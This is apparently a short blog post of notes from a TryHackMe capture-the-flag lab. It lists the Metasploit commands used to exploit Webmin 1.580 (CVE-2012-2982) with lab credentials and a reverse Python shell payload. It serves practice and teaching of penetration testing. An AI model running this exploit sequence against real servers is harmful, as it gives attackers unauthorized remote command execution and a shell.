TASK 6
Using the CMS dashboard version, use Metasploit to find a payload to execute against the machine.
Webmin version : 1.580
vulun : CVE-2012-2982
use exploit/unix/webapp/webmin_show_cgi_exec
set RHOSTS
set RPORT 10000
set SSL false
set USERNAME agent47
set PASSWORD videogamer124
set payload cmd/unix/reverse_python
set LHOST
set LPORT 10000
exploit
'Play > THM' 카테고리의 다른 글
Windows Local Persistence (2) (0) | 2023.09.25 |
---|---|
Windows Local Persistence (1) (0) | 2023.09.25 |
THM Offensive Pentesting - HackPack (0) | 2023.07.19 |
THM Offensive Pentesting - Alfred (3) | 2023.07.18 |
THM Offensive Pentesting - Steel Mountain (0) | 2023.07.18 |